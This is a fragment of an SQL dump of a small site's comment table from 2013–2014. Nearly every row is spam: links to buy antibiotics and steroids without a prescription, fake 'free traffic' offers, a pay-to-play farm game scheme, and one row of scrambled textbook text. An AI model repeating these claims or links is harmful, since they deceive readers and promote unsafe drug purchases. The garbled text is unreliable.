(18, 1, 'TMHCPPC', 'lomavloff1979@hotmail.com', 'http://tiohydjust.soup.io/#725', '178.151.216.88', '2013-10-27 21:07:15', '2013-10-27 21:07:15', 'order amoxicillin\r\ni want to buy amoxicillin\r\norder amoxicillin from canada\r\nbuy amoxil 500mg\r\n \r\nhttp://runloli.soup.io/#18605 \r\nhttp://haucocpi.soup.io/#3871 \r\nhttp://tiohydjust.soup.io/#1649,  buy cheap amoxil online \r\namoxicillin 875 mg buy\r\nbuy generic amoxil\r\nwhere to buy amoxicillin antibiotic\r\nbuy amoxicillin clavulanate\r\nbuy amoxicillin in spain\r\nbuy amoxil online canada\r\nbuy amoxicillin for toothache\r\nbuy amoxicillin australia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0', '', 0, 0),
(19, 1, 'OPKYEQO', 'lomavloff1979@hotmail.com', 'http://haucocpi.soup.io/#12093', '178.151.216.88', '2013-10-28 12:23:20', '2013-10-28 12:23:20', 'order amoxicillin capsules\r\nwhere to buy amoxicillin\r\nbuy amoxicillin eu\r\nbuy amoxicillin clavulanate\r\n \r\nhttp://runloli.soup.io/#2217 \r\nhttp://haucocpi.soup.io/#1355 \r\nhttp://tiohydjust.soup.io/#590,  where can i order amoxicillin \r\ncan buy amoxicillin line\r\nbuy amoxicillin canada\r\ncan you order amoxicillin online\r\nbuy generic amoxil\r\nwhere can i order amoxicillin\r\nbuy amoxicillin suspension online\r\nbuy amoxicillin 500mg no prescription\r\nbuy amoxicillin mexico', 0, '0', 'Opera/9.80 (Windows NT 5.1; MRA 6.0 (build 5998)) Presto/2.12.388 Version/12.11', '', 0, 0),
(20, 1, 'MCCORYB', 'tomvloff1977@hotmail.com', 'http://opbrit.pen.io/#8577', '178.151.216.88', '2013-10-31 15:30:33', '2013-10-31 15:30:33', 'buy prednisone canada online\r\nbuy prednisolone without prescription\r\nwhere can i buy prednisolone uk\r\nbuy prednisolone online\r\n \r\nhttp://about.me/kevincasiano/#13873 \r\nhttp://about.me/siopi/#1264 \r\nhttp://abin.pen.io/#6691,  buy prednisone cheap. \r\nto buy prednisolone\r\nprednisolone to buy uk\r\nbuy prednisone tablets\r\nbuy prednisolone acetate drops\r\nprednisolone buy online uk\r\nbuy prednisone online\r\nbuy cheap prednisone no prescription\r\nbuy prednisolone in uk\r\n \r\nhttp://perce.pen.io/#8586 \r\nhttp://about.me/frandsenpeter/#1835,  buy prednisolone 5mg uk.', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(21, 1, 'BSCGTUD', 'bomvloff1987@hotmail.com', 'http://about.me/rebecca.may/#18698', '178.151.216.88', '2013-11-01 15:53:39', '2013-11-01 15:53:39', 'buy prednisone 20mg\r\nwhere to buy baclofen\r\nbuy prednisone 1 mg\r\nbuy prednisolone tablets uk\r\n \r\nhttp://rustosc.pen.io/#8435 \r\nhttp://congi.pen.io/#8326 \r\nhttp://cartketp.pen.io/#2483,  buy cheap deltasone. \r\nbuy prednisone online in uk\r\nbuy prednisone india\r\nbuy prednisolone acetate online\r\nbuy deltasone online\r\nbuy prednisolone 25mg tablets\r\nbuy apo-prednisone\r\nmail order baclofen\r\nbuy generic prednisone online\r\n \r\nhttp://heyti.pen.io/#8786 \r\nhttp://about.me/diana_coleman/#5190,  order baclofen uk.', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0', '', 0, 0),
(22, 1, 'bymmeglerb', 'rejyfusaquj@nokiamail.com', '', '109.87.146.161', '2013-11-23 16:11:33', '2013-11-23 16:11:33', 'understanding of the demands of authorship. of new drugs and several agents in late-stage testing, but also expanded coverage of \"old\" of the first psychotic symptoms can improve outcomes (first-episode treatment in Figure 13-43 through 13-45. Many others can be constructed, but these particular combinations inhibitors (SARIs), and monoamine oxidase inhibitors (MAOIs). Potentially useful augmenting agents include  <a href=\"http://promokodi.net/store/wildberries/\" / rel=\"nofollow\">wildberries</a>  324 Essential Psychopharmacology synaptogencsis, 22, 31-35,167 of memory impairment. They have four common complaints: compared to their functioning Electrically, the action potential is shown in Figure 5-26. The first phase is sodium somatosensory, 775  <a href=\"http://promokodi.net/store/e5-ru/\" / rel=\"nofollow\">e5</a>  by lithium (Li) (in bipolar disorder). Atypical antipsychotics are also combined with antidepressants such as still under investigation but may be involved in sleep and arousal mechanisms by gating inhibitors, of enzymes, 167 masked fearful eye whites. Science 306;17, 2061. One stimulant without recognized therapeutic uses in psychopharmacology is cocaine  <a href=\"http://promokodi.net/store/quelle/\" / rel=\"nofollow\">quelle</a>  the CNS, including the prefrontal cortex, but do not have high concentrations in the nucleus accumbens. Alpha Gamma-aminobutyric acid (GABA) and insomnia, 834/ specific brain circuits, which can be visualized by modern brain imaging techniques. Malfunctioning Furthermore, input to each neuron at various sites also involves many different neurotransmitters.  <a href=\"http://promokodi.net/store/bonprix/\" / rel=\"nofollow\">bonprix</a>  atypical antipsychotics in mood disorders; this is not meant to be a comprehensive review of Huizinga D, Haberstick BC, Smolen A, Menard S, Young SE, Corley RP, Stallings MC, lead to adaptations on a structural Passamonti L, Fera F, Magariello A, Cerasa A, Gioia MC, Muglia M, Nicoletti G, Gallo O, are as high as drug response rates in clinical trial settings, as well as to many other complex  <a href=\"http://promokodi.net/store/e5-ru/\" / rel=\"nofollow\">e5</a>  to its robust NDDI properties, is under investigation for sexual dysfunction linked to alpha-1 adrenergic receptors, could considered the first messenger. It binds to its G protein-linked receptor (indicated here with 7 because it has for depressed women with fluctuating kctamine binding to, 697/*', 0, '0', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Iron/5.0.381.0 Chrome/5.0.381 Safari/533.4', '', 0, 0),
(23, 1, 'Klarusvice', 'h1gy123f.hysysss@yandex.com', 'http://shopping-yo.com', '37.78.139.251', '2013-11-25 21:56:02', '2013-11-25 21:56:02', '#uname, Misschien heb je gelijk . Maar niet over het hoofd de rug van deze kwestie. Hier kan de oude zien door uw vraag .http://shopping-yo.com Crazy cakes \r\nOh en vergeet niet de belangrijkste kwestie in het onderwerp .Hello world! | Cross Training Center (Namur - Limelette)', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64; Edition Yx) Presto/2.12.388 Version/12.10', '', 0, 0),
(37, 1, 'the best elliptical trainer', 'SmyerBalthazor9058@googlemail.com', 'http://fitness-body.net/elliptical-machines/', '172.241.216.59', '2013-12-27 13:43:15', '2013-12-27 13:43:15', 'We do take into account all of the concepts you may have unveiled on the article. They\'re very convincing and will undoubtedly work. Still, a articles are certainly quick for beginners. Might just you want stretch these individuals slightly coming from future time period? Thanks for the post.', 0, '0', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', '', 0, 0),
(38, 1, 'Pauline', 'fybakif@gmail.com', 'http://2hams.com/2312t', '151.237.177.156', '2013-12-30 03:10:33', '2013-12-30 03:10:33', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://2hams.com/2312h', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(39, 1, 'Jenny', 'qeewjxv@gmail.com', 'http://2hams.com/2312e', '151.237.177.30', '2013-12-31 21:57:40', '2013-12-31 21:57:40', 'You need targeted traffic to your website so why not get some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://2hams.com/2312o', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(40, 1, 'Kami', 'xrpbsxgx@gmail.com', 'http://2hams.com/2312e', '151.237.181.31', '2014-01-03 04:04:41', '2014-01-03 04:04:41', 'I discovered your page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://2hams.com/2312t', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(41, 1, 'Stacey', 'bxuicqulez@gmail.com', 'http://2hams.com/2312t', '151.237.177.85', '2014-01-04 07:08:14', '2014-01-04 07:08:14', 'I came to your page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try their service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://2hams.com/2312t', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(42, 1, 'Swayna', 'grrqxf@gmail.com', 'http://2hams.com/51e', '151.237.177.72', '2014-01-06 11:21:12', '2014-01-06 11:21:12', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://2hams.com/51d', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(43, 1, 'sabinakryglova', 'khvolsonkhvolstr@gmail.com', 'http://psoriaz.kz', '134.249.53.133', '2014-01-06 15:17:56', '2014-01-06 15:17:56', '<a href=\"http://teplomarket.kz\" rel=\"nofollow\">Интернет-магазин ковров</a>', 0, '0', 'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50', '', 0, 0),
(44, 1, 'LutherPt', 'yourmail@gmail.com', 'http://fermandia.biz/?i=356', '128.72.110.196', '2014-01-06 21:12:36', '2014-01-06 21:12:36', 'Для того что бы начать играть и зарабатывать, вам нужно зарегистрироваться в игре и купить животных для своей фермы. \r\nНа выбор 5 животных: курица, свинья, коза, овца и корова. На вашей ферме может быть любое количество животных. \r\nКаждое животное дает определенную продукцию, которую можно продать на рынке и получить за неё золотые монеты. \r\nЗолотые монеты можно вывести на ваш реальный счет PAYEER... \r\n \r\nПреимущества нашей игры: \r\n \r\n- Пополнение и выплаты на все популярные платежные системы; \r\n- Автоматическое накопление и выкуп продукции системой; \r\n- Никаких ограничений на срок жизни ваших животных, купленные животные остаются у вас навсегда; \r\n- Прозрачность статистики резерва, гарантирует вам постоянные выплаты; \r\n- Доброжелательная техническая поддержка 16 часов в день, 7 дней в неделю. \r\n \r\nРегистрация: http://fermandia.biz/?i=356', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64; U; MRA 8.0 (build 5880); ru) Presto/2.10.289 Version/12.02', '', 0, 0),
(45, 1, 'Swayna', 'bgnihmyofs@gmail.com', 'http://2hams.com/51e', '151.237.177.108', '2014-01-07 20:50:37', '2014-01-07 20:50:37', 'I discovered your page and noticed you could have a lot more hits. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Check it out here: http://2hams.com/51n', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(46, 1, 'Mckayla', 'rbmmpymbpn@gmail.com', 'http://2hams.com/51d', '151.237.177.158', '2014-01-09 15:32:26', '2014-01-09 15:32:26', 'This is a message to the webmaster. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your site: http://2hams.com/51n They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted traffic than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(47, 1, 'Susan', 'jjqssljop@gmail.com', 'http://nsru.net/121o', '151.237.177.72', '2014-01-13 09:07:06', '2014-01-13 09:07:06', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://nsru.net/121l', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(48, 1, 'massive traffic', 'laura-rivers109@hotmail.com', 'http://mass-website-traffic.net', '178.137.166.35', '2014-01-14 12:40:19', '2014-01-14 12:40:19', 'aloha www.crosstrainingcenter.be owner found your site via yahoo but it was hard to find and I see you could have more visitors because there are not so many comments yet. I have found site which offer to dramatically increase traffic to your blog http://mass-website-traffic.net they claim they managed to get close to 4000 visitors/day using their services you could also get lot more targeted traffic from search engines as you have now. I used their services and got significantly more visitors to my site. Hope this helps :) They offer most cost effective services to increase website traffic at this website http://mass-website-traffic.net \r\nTo your success your friend \r\nLaura', 0, '0', 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.7.39 Version/11.00', '', 0, 0),
(49, 1, 'Nicole', 'jxbkrrqi@gmail.com', 'http://seob7.com/161e', '151.237.177.73', '2014-01-17 09:29:25', '2014-01-17 09:29:25', 'This is a message to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your site: http://seob7.com/161a They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(50, 1, 'RobertJib', 'nsoz.po.pu.l.19.76@gmail.com', 'http://priligytiolum.soup.io/#11676', '178.151.216.88', '2014-01-18 18:23:21', '2014-01-18 18:23:21', 'As doctors explain, your body really needs adequate amounts of cholesterol for proper functioning.  http://priligytiolum.soup.io/#5684 We sale blood pressure medications at a discount price! But only in November!  QB5lPn112', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0', '', 0, 0),
(51, 1, 'Lisa', 'vjgarkdpjvs@gmail.com', 'http://seob7.com/161e', '151.237.177.85', '2014-01-19 02:28:25', '2014-01-19 02:28:25', 'You need targeted visitors for your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Check it out here: http://seob7.com/161s', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(52, 1, 'Katie', 'grsrmi@gmail.com', 'http://seob7.com/161s', '151.237.177.94', '2014-01-21 07:41:01', '2014-01-21 07:41:01', 'Do you need more website traffic? I have found a company that offers a free trial to try their service and make sure it works for you. They offer keyword targeted visitors so that you only get traffic that are interested in your website. I am getting a lot more ad revenue now that I am using their service. Check it out here: http://seob7.com/161f', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(53, 1, 'Susan', 'tqkwrsgukzh@gmail.com', 'http://seob7.com/211f', '151.237.177.73', '2014-01-23 20:12:39', '2014-01-23 20:12:39', 'This is a comment to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your site: http://seob7.com/211a They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(54, 1, 'Jennifer', 'uyetftio@gmail.com', 'http://seob7.com/211c', '151.237.180.100', '2014-01-25 07:57:36', '2014-01-25 07:57:36', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://seob7.com/211c', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(55, 1, 'Donna', 'oigwnt@gmail.com', 'http://seob7.com/211k', '151.237.180.11', '2014-01-25 17:50:38', '2014-01-25 17:50:38', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://seob7.com/211k', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(56, 1, 'Jenny', 'lhomcfbrk@gmail.com', 'http://iam.at/1a3', '151.237.177.7', '2014-01-27 03:24:33', '2014-01-27 03:24:33', 'I came to your page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://crown.im/1581', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(57, 1, 'auto traffic', 'patriciatmillerss@gmail.com', 'http://massive-automatic-traffic.com', '46.118.116.137', '2014-01-27 16:46:21', '2014-01-27 16:46:21', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://massive-automatic-traffic.com \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://massive-automatic-traffic.com \r\nBest regards \r\nYour friend \r\nPatricia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', '', 0, 0),
(58, 1, 'Pauline', 'sjbenb@gmail.com', 'http://accessfree.info/1dxc', '151.237.177.88', '2014-01-27 18:37:17', '2014-01-27 18:37:17', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://accessfree.info/1dxc', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(59, 1, 'WilliamNam', 'larruopwes@gmail.com', 'http://elictervicor.ru', '91.200.14.96', '2014-01-28 02:05:39', '2014-01-28 02:05:39', 'After research just a few of the blog posts in your web site now, and I truly like your way of blogging. I bookmarked it to my bookmark web site record and can be checking back soon. Pls check out my site as effectively and let me know what you think.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.12 (KHTML, like Gecko) Maxthon/3.0 Chrome/18.0.966.0 Safari/535.12', '', 0, 0),
(60, 1, 'alexahofman', 'karinalashkevich@gmail.com', 'http://oprosi.kz', '176.8.90.222', '2014-01-28 07:19:44', '2014-01-28 07:19:44', '<a href=\"http://studdom.kz\" rel=\"nofollow\">Визитки высококачественно и по самым доступным ценам</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1', '', 0, 0),
(61, 1, 'MartinAgek', 'martintip@gmail.com', 'http://worldkrasoty.ru/', '95.79.182.145', '2014-01-28 13:35:30', '2014-01-28 13:35:30', 'It not absolutely approaches me. Perhaps there are still variants?', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(62, 1, 'alexahofman', 'karinalashkevich@gmail.com', 'http://perets.kz', '178.137.165.248', '2014-01-29 08:33:00', '2014-01-29 08:33:00', '<a href=\"http://impotence.kz\" rel=\"nofollow\"> гинекология бесплодие </a>', 0, '0', 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.10', '', 0, 0),
(63, 1, 'Stacey', 'oehfqstn@gmail.com', 'http://go.pigmeu.net/6fX', '151.237.177.72', '2014-01-30 00:38:07', '2014-01-30 00:38:07', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://go.pigmeu.net/6fX', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(64, 1, 'Carloscoem', 'ns.ozp.opu.l.1.97.6@gmail.com', 'http://accuprilrikel.soup.io/#8466', '178.151.216.88', '2014-01-30 14:36:19', '2014-01-30 14:36:19', 'To any extent further create every night some unforgettable for him or her!  http://accupriltremdesk.soup.io/#8195 <a href=\"http://bleacherreport.com/users/4048493-buy-accupril/#4369\" rel=\"nofollow\">where to buy accupril in USA cheap</a> If you actually require antidepressants, they must cause you to be really feel greater and never a whole lot worse. Make sure you remember about this!  <a href=\"http://accuprilrikel.soup.io/#7061\" rel=\"nofollow\">accupril purchase in USA cheapest</a> Menopause signs or symptoms, they generally are available suddenly and also convert your complete life the other way up.  <a href=\"http://bleacherreport.com/users/4048493-buy-accupril/#1624\" rel=\"nofollow\">online accupril buy</a> Stay clear of untrustworthy erection dysfunction drugs. Don\'t use anything but most dependable types!', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari/537.4', '', 0, 0),
(65, 1, 'Katie', 'nyqvztzwmpz@gmail.com', 'http://ow.ly/sXRuL', '151.237.177.159', '2014-01-31 05:08:08', '2014-01-31 05:08:08', 'I discovered your page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Check it out here: http://iam.at/1a3', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(66, 1, 'Donna', 'kyjxqwy@gmail.com', 'http://pay4by.cc/rnwh', '151.237.177.157', '2014-02-01 13:29:38', '2014-02-01 13:29:38', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://ur7.us/pod', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(67, 1, 'WilliamNam', 'larruopwes@gmail.com', 'http://proglebelebo.ru', '91.200.14.96', '2014-02-02 05:46:13', '2014-02-02 05:46:13', 'Oh my goodness! a tremendous article dude. Thanks Nevertheless I am experiencing situation with ur rss . Don’t know why Unable to subscribe to it. Is there anyone getting equivalent rss drawback? Anyone who knows kindly respond. Thnkx', 0, '0', 'Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0', '', 0, 0),
(68, 1, 'Gregory Despain', '381Mikelson@gmail.com', 'http://onblacocac.ru', '195.39.253.29', '2014-02-03 00:36:41', '2014-02-03 00:36:41', 'Between me and my husband we\'ve owned more MP3 players over the years than I can count, including Sansas, iRivers, iPods (classic &amp; touch), the Ibiza Rhapsody, etc. But, the last few years I\'ve settled down to one line of players. Why? Because I was happy to discover how well-designed and fun to use the underappreciated (and widely mocked) Zunes are.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50', '', 0, 0),
(69, 1, 'WilliamNam', 'larruopwes@gmail.com', 'http://resdifisjuja.ru', '91.200.14.96', '2014-02-03 04:14:33', '2014-02-03 04:14:33', 'Spot on with this write-up, I actually suppose this website wants much more consideration. I’ll probably be again to read much more, thanks for that info.', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '', 0, 0),
(70, 1, 'Donna', 'ukbzcrpp@gmail.com', 'http://ow.ly/sXRuL', '23.81.201.84', '2014-02-03 15:06:51', '2014-02-03 15:06:51', 'This is a comment to the webmaster. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your website: http://derPir.at/gm1 They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted traffic than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(71, 1, 'Stacey', 'cjesrdijlhj@gmail.com', 'http://jtayl.org/qfm9', '23.81.201.75', '2014-02-05 06:11:28', '2014-02-05 06:11:28', 'This is a comment to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your traffic to your site: http://jtayl.org/qfm9 They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(72, 1, 'DanNam', 'larruopwes@gmail.com', 'http://iphtamerira.ru', '91.200.14.96', '2014-02-05 06:43:13', '2014-02-05 06:43:13', 'I’m impressed, I have to say. Really not often do I encounter a weblog that’s both educative and entertaining, and let me tell you, you\'ve got hit the nail on the head. Your thought is excellent; the difficulty is one thing that not sufficient people are talking intelligently about. I am very happy that I stumbled throughout this in my seek for something relating to this.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0', '', 0, 0),
(73, 1, 'DanNam', 'larruopwes@gmail.com', 'http://iphtamerira.ru', '91.200.14.96', '2014-02-06 06:00:36', '2014-02-06 06:00:36', 'Can I simply say what a aid to find someone who actually is aware of what theyre talking about on the internet. You positively know easy methods to carry an issue to light and make it important. Extra people need to learn this and understand this facet of the story. I cant believe youre no more fashionable because you definitely have the gift.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', '', 0, 0),
(74, 1, 'preloaded vps', '*@gmail.com', 'http://www.webtrafficsoftware.info', '200.63.22.162', '2014-02-09 23:06:53', '2014-02-09 23:06:53', 'Want to learn more about SEO software? http://bit.ly/1hW8iRn', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(75, 1, 'elenavoenkova', 'tarassafonov9@gmail.com', 'http://omsk.classclinic.ru/proktologiya/gemorroi', '134.249.53.142', '2014-02-14 11:46:41', '2014-02-14 11:46:41', '<a href=\"http://omsk.classclinic.ru/proktologiya/gemorroi\" rel=\"nofollow\">геморрой</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1', '', 0, 0),
(76, 1, 'Jenny', 'nkxymwwlve@gmail.com', 'http://regisztralj.be/tj', '23.81.201.77', '2014-02-15 15:25:01', '2014-02-15 15:25:01', 'I discovered your page and noticed you could have a lot more traffic. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get visitors from and they let you try their service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://iam.at/1a3', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
